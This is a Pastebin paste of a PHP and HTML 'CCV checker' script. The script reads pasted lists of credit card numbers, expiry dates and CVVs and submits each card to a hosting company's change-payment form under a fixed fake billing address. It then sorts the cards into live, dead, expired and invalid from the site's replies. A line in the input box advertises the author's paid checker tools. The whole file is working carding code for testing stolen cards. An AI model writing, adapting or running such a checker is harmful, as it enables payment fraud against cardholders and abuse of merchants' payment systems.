Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>CCV checker Kusanghi</title>
- <style>
- body, table{
- background:#000000;
- padding:5px;
- margin:5px;
- font-family:Tahoma;
- font-size:11px;
- color:#FFFFFF;
- }
- textarea,input,select
- {
- background:#736F6E;
- color:#FFFFFF;
- border:dashed #ffff00;
- }
- a {
- color:#00ff00;
- }
- a:hover{
- color:#ffff00;
- }
- fieldset {
- padding:5px;
- border-width: 1px;
- border-style: dotted;
- border-color: #ccc;
- text-align: left;
- background: #000000;
- position: relative;
- }
- legend {
- border-width: 1px;
- border-style: solid;
- border-color: #ccc;
- padding: 0 0.5em;
- background: #000000;
- font-size: 110%;
- color: #3e8f96;
- line-height: 1.5em;
- position: relative;
- top: -0.75em;
- letter-spacing: 2px;
- font-weight: bold;
- }
- .style1 {
- background-color: #008000;
- }
- </style>
- <script type="text/javascript" src="jquery.min.js"></script>
- </head>
- <body onLoad="init()">
- <div id="loading" style="position:absolute; width:100%; text-align:center; top:250px;">
- Processing, wait...<br />
- <img src="loading.gif" border=0></div>
- </body>
- <script>
- var ld=(document.all);
- var ns4=document.layers;
- var ns6=document.getElementById&&!document.all;
- var ie4=document.all;
- if (ns4)
- ld=document.loading;
- else if (ns6)
- ld=document.getElementById("loading").style;
- else if (ie4)
- ld=document.all.loading.style;
- function init()
- {
- if(ns4){ld.visibility="hidden";}
- else if (ns6||ie4) ld.display="none";
- }
- </script>
- <?php
- function _curl($url,$post="",$usecookie = true) {
- $ch = curl_init();
- if($post) {
- curl_setopt($ch, CURLOPT_POST ,1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- }
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- if ($usecookie) {
- curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
- }
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $result=curl_exec ($ch);
- curl_close ($ch);
- return $result;
- }
- function percent($num_amount, $num_total) {
- $count1 = $num_amount / $num_total;
- $count2 = $count1 * 100;
- $count = number_format($count2, 0);
- return $count;
- }
- function getStr($string,$start,$end){
- $str = explode($start,$string);
- $str = explode($end,$str[1]);
- return $str[0];
- }
- function checkMon($date,$type){
- $len = strlen($date);
- if ($type == 2){
- if($len == 2){
- return $date;
- }
- elseif($len == 1){
- switch($date){
- case '1': $date='01'; break;
- case '2': $date='02'; break;
- case '3': $date='03'; break;
- case '4': $date='04'; break;
- case '5': $date='05'; break;
- case '6': $date='06'; break;
- case '7': $date='07'; break;
- case '8': $date='08'; break;
- case '9': $date='09'; break;
- }
- }
- return $date;
- }
- elseif ($type == 1){
- if($len == 2){
- switch ($date){
- case '01': $date='1'; break;
- case '02': $date='2'; break;
- case '03': $date='3'; break;
- case '04': $date='4'; break;
- case '05': $date='5'; break;
- case '06': $date='6'; break;
- case '07': $date='7'; break;
- case '08': $date='8'; break;
- case '09': $date='9'; break;
- case '10': $date='10'; break;
- case '11': $date='11'; break;
- case '12': $date='12'; break;
- }
- return $date;
- }
- elseif($len == 1) return $date;
- }
- else return false;
- }
- function checkYear($date,$type){
- $len = strlen($date);
- if($type == 4){
- if($len == 4) return $date;
- elseif($len == 2) return "20".$date;
- }
- elseif($type == 2){
- if($len == 2) return $date;
- elseif($len == 4) return substr($date,-2);
- }
- else return false;
- }
- function multi_explode($pattern, $string, $standardDelimiter = ':'){
- $string = preg_replace(array($pattern, "/{$standardDelimiter}+/s"), $standardDelimiter, $string);
- return explode($standardDelimiter, $string);
- }
- function info($ccline,$type){
- $iscvv = 1;
- $pattern = '/[:\|\\\\\/\s]/';
- $line = multi_explode($pattern,$ccline);
- $typemy = explode(" ",$type);
- $typem = strlen($typemy[0]);
- $typey = strlen($typemy[1]);
- $amex = "AmexCard";
- $visa = "VisaCard";
- $mast = "MasterCard";
- $disc = "DiscoverCard";
- foreach($line as $col){
- if(is_numeric($col)){
- switch(strlen($col)){
- case 15:
- if(substr($col,0,1)==3){
- $ccnum['num'] = $col;
- $ccnum['type'] = $amex;
- }
- break;
- case 16:
- switch(substr($col,0,1)){
- case '4':
- $ccnum['num'] = $col;
- $ccnum['type'] = $visa;
- break;
- case '5':
- $ccnum['num'] = $col;
- $ccnum['type'] = $mast;
- break;
- case '6':
- $ccnum['num'] = $col;
- $ccnum['type'] = $disc;
- break;
- }
- break;
- case 1:
- if (($col >= 1) and ($col <=12) and (!isset($ccnum['mon']))) $ccnum['mon'] = checkMon($col,$typem); break;
- case 2:
- if (($col >= 1) and ($col <=12) and (!isset($ccnum['mon']))){
- $ccnum['mon'] = checkMon($col,$typem);
- }
- elseif (($col >= 9) and ($col <= 34) and (isset($ccnum['mon'])) and (!isset($ccnum['year']))) $ccnum['year'] = checkYear($col,$typey);
- break;
- case 4:
- if (($col >= 2009) and ($col <= 2034) and (isset($ccnum['mon']))) $ccnum['year'] = checkYear($col,$typey);
- elseif ((substr($col,0,2) >= 1) and (substr($col,0,2) <=12) and (substr($col,2,2)>= 9) and (substr($col,2,2) <= 34) and (!isset($ccnum['mon'])) and (!isset($ccnum['year']))){
- $ccnum['mon'] = checkMon(substr($col,0,2),$typem);
- $ccnum['year'] = checkYear(substr($col,-2),$typey);
- }
- else $ccv['cv4'] = $col;
- break;
- case 6:
- if ((substr($col,0,2) >= 1) and (substr($col,0,2) <=12) and (substr($col,2,4)>= 2034) and (substr($col,2,4) <= 2034)){
- $ccnum['mon'] = checkMon(substr($col,0,2),$typem);
- $ccnum['year'] = checkYear(substr($col,-2),$typey);
- }
- break;
- case 5:
- $ccnum['zip'] = $col;
- break;
- case 3:
- $ccv['cv3'] = $col;
- break;
- }
- }
- }
- if($iscvv == 1){
- if ($ccnum['type'] == $amex) $ccnum['cvv'] = $ccv['cv4'];
- else $ccnum['cvv'] = $ccv['cv3'];
- return $ccnum;
- }
- else return $ccnum;
- }
- function state($zip){
- $file = file_get_contents('../db/zipdb.csv');
- $info = "'".trim(getStr($file,"'$zip'","\n"));
- $info = explode("', '",$info);
- return trim($info[1]);
- }
- function inStr($s,$as){
- $s=strtoupper($s);
- if(!is_array($as)) $as=array($as);
- for($i=0;$i<count($as);$i++) if(strpos(($s),strtoupper($as[$i]))!==false) return true;
- return false;
- }
- if ($_POST['cclist']){
- global $cookie;
- $cookie = tempnam('robocon','avo'.rand(1000000,9999999).'tmp.txt');
- $cclive = "";
- $ccdie = "";
- $ccerr = "";
- $cccant = "";
- $uncheck = "";
- $limit = "";
- $cclist = trim($_POST['cclist']);
- $cclist = str_replace(array("\\\"","\\'"),array("\"","'"),$cclist);
- $cclist = str_replace("\r\r","\r",$cclist);
- $cclist = str_replace("\n\n","\n",$cclist);
- $cclist = explode("\n",$cclist);
- $STT = 0;
- $TOTAL = count($cclist);
- $free = 0;
- $fee = 3;
- $countf = 0;
- for($i=0;$i<count($cclist);$i++){
- $countf++;
- $ccnum = info($cclist[$i],"xx yyyy");
- $type = $ccnum['type'];
- $ccn = $ccnum['num'];
- $ccmon = $ccnum['mon'];
- $ccyear = $ccnum['year'];
- if($ccyear==2014) {$ccyear="14";}
- elseif($ccyear==2015) {$ccyear="15";}
- elseif($ccyear==2016) {$ccyear="16";}
- elseif($ccyear==2017) {$ccyear="17";}
- elseif($ccyear==2018) {$ccyear="18";}
- elseif($ccyear==2019) {$ccyear="19";}
- elseif($ccyear==2020) {$ccyear="20";}
- elseif($ccyear==2021) {$ccyear="21";}
- elseif($ccyear==2022) {$ccyear="22";}
- elseif($ccyear==2023) {$ccyear="23";}
- elseif($ccyear==2024) {$ccyear="24";}
- elseif($ccyear==2025) {$ccyear="25";}
- elseif($ccyear==2026) {$ccyear="26";}
- elseif($ccyear==2027) {$ccyear="27";}
- elseif($ccyear==2028) {$ccyear="28";}
- elseif($ccyear==2029) {$ccyear="29";}
- elseif($ccyear==2030) {$ccyear="30";}
- elseif($ccyear==2031) {$ccyear="31";}
- elseif($ccyear==2032) {$ccyear="32";}
- elseif($ccyear==2033) {$ccyear="33";}
- elseif($ccyear==2034) {$ccyear="34";}
- $cvv = $ccnum['cvv'];
- if ($ccn){
- $STT++;
- // Process CURL Session
- $UserLogin = 'TaiKhoanODay';
- $PassLogin = 'PassODay';
- $link1 = "https://my.1and1.com/ChangeCCDataPrep";
- $s = _curl($link1,$cookie);
- // Process Login
- $session = getStr($s,'method="post" id="login-form" action="','"');
- $link2 = "https://my.1and1.com".$session;
- $post = "__lf=ChangeCCDataFlow&__sendingdata=1&__sendingauthdata=1&login.SelectContract=&login.User=".$UserLogin."&login.Pass=".$PassLogin."&__SBMT%3Ad0e810d2%3A=";
- $s = _curl($link2,$post);
- // Process Payment
- $ipay = getStr($s,'frameborder="0" height="800" scrolling="auto" width="100%" src="','"');
- $s = _curl($ipay,$cookie);
- $ip = getStr($s,'name="__ip_sess" value="','"');
- $link = $ipay;
- $post = "trx_paymenttyp=cc&addr_data_used=alt&cc_typ=$type&cc_number=$ccn&cc_checkcode=$cvv&cc_expdate_month=$ccmon&cc_expdate_year=$ccyear&alt_addr_name=Anna+Conway&alt_addr_street=22900+Estoril+Dr&alt_addr_street2=&alt_addr_city=Diamond+bar&alt_addr_zip=91765&alt_addr_country=US&alt_addr_state=CA&__ip_sess=$ip&ccform_submit.x=39&ccform_submit.y=9";
- $s = _curl($link,$post);
- if(inStr($s,'Thank You')){
- echo "$STT/$TOTAL | <font color=green>Live | ".$cclist[$i]." "." | \n</font><br>";
- $cclive .= $cclist[$i]."\n" ;
- }
- elseif(inStr($s,'This credit card cannot be accepted. Please check your data.')){
- echo "$STT/$TOTAL | <font color=red>Die | ".$cclist[$i]." "." | \n</font><br>";
- $ccdie .= $cclist[$i]."\n";
- }
- elseif(stristr($s,'This card is about to expire. Please use another credit card.')){
- echo "$STT/$TOTAL | <font color=blue>Exp | ".$cclist[$i]." "." | \n</font><br>";
- $ccexp .= $cclist[$i]."\n";
- }
- elseif(stristr($s,'Invalid expiration date')){
- echo "$STT/$TOTAL | <font color=blue>Exp | ".$cclist[$i]." "." | \n</font><br>";
- $ccexp .= $cclist[$i]."\n";
- }
- elseif(inStr($s,'Invalid credit card number.')||inStr($s,'The credit card number is invalid for the choosen card type.')){
- echo "$STT/$TOTAL | <font color=DarkTurquoise>Card Invalid | ".$cclist[$i]." "." | \n</font><br>";
- $ccinva .= $cclist[$i]."\n";
- }
- else{
- echo "$STT/$TOTAL| <font color=orange>Cant Check | ".$cclist[$i]." "." | \n</font><br>";
- $cccanot .= $cclist[$i]."\n";
- }
- }
- flush();
- }
- unlink($cookie);
- $per1 = percent(count(explode("\n",$cclive))-1,count($cclist));
- $per2 = percent(count(explode("\n",$ccdie))-1,count($cclist));
- $per3 = percent(count(explode("\n",$ccinva))-1,count($cclist));
- $per4 = percent(count(explode("\n",$ccexp))-1,count($cclist));
- $per5 = percent(count(explode("\n",$cccant))-1,count($cclist));
- $per6 = percent(count(explode("\n",$limit))-1,count($cclist));
- echo "<br><br><center><input type='submit' value='Next Check' onclick='location.replace(\"?\")'/></center>";
- echo "<center>";
- if($cclive!=""){
- echo "<h2><font color=green>Live</font> $per1 % (".(count(explode("\n",$cclive))-1)."/".count($cclist).")</h2>";
- echo "<textarea wrap=off rows=10 style=\"width:90%\">$cclive</textarea><br>";
- }
- if($ccdie!=""){
- echo "<h2><font color=red>Die</font> $per2 % (".(count(explode("\n",$ccdie))-1)."/".count($cclist).")</h2>";
- echo "<textarea wrap=off rows=10 style=\"width:90%\">$ccdie</textarea><br>";
- }
- if($ccinva!=""){
- echo "<h2><font color=red>Invalid</font> $per3 % (".(count(explode("\n",$ccinva))-1)."/".count($cclist).")</h2>";
- echo "<textarea wrap=off rows=10 style=\"width:90%\">$ccinva</textarea><br>";
- }
- if($ccexp!=""){
- echo "<h2><font color=red>Exp</font> $per4 % (".(count(explode("\n",$ccexp))-1)."/".count($cclist).")</h2>";
- echo "<textarea wrap=off rows=10 style=\"width:90%\">$ccexp</textarea><br>";
- }
- if($cccant!=""){
- echo "<h2><font color=orange>CantCheck</font> $per5 % (".(count(explode("\n",$cccant))-1)."/".count($cclist).")</h2>";
- echo "<textarea wrap=off rows=10 style=\"width:90%\">$cccant</textarea><br>";
- }
- }
- else{
- ?>
- <center><span class="style1">ACCEPT VISA-MASTER-AMEX-DIS<br>Accept All Country</span></center>
- <form method="POST" action="">
- <fieldset>
- <legend>Enter List CC :</legend>
- <form action="" method=post name=f>
- <p align="center">
- <textarea id="cclist" name="cclist" class="textarea" style="width: 978px; height: 210px">You need Coder Tool Check CCV, PM YH: kusanghi
- You have Gate Check, You need code Tool. Mail : [email protected]</textarea><br>Duplicate Remove: <input name=dup type=checkbox value=1 checked> Sort By Type: <input name=type type=checkbox value=1 checked><br>
- Filter Date : <input name=date type=checkbox value=1 checked> Only check BIN: <input type=text name=bin MAXLENGTH=6 size=8 style="text-align:center"><br>
- <input type=submit name=submit value="CHECK">
- </p>
- </form>
- </fieldset>
- <?php }?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement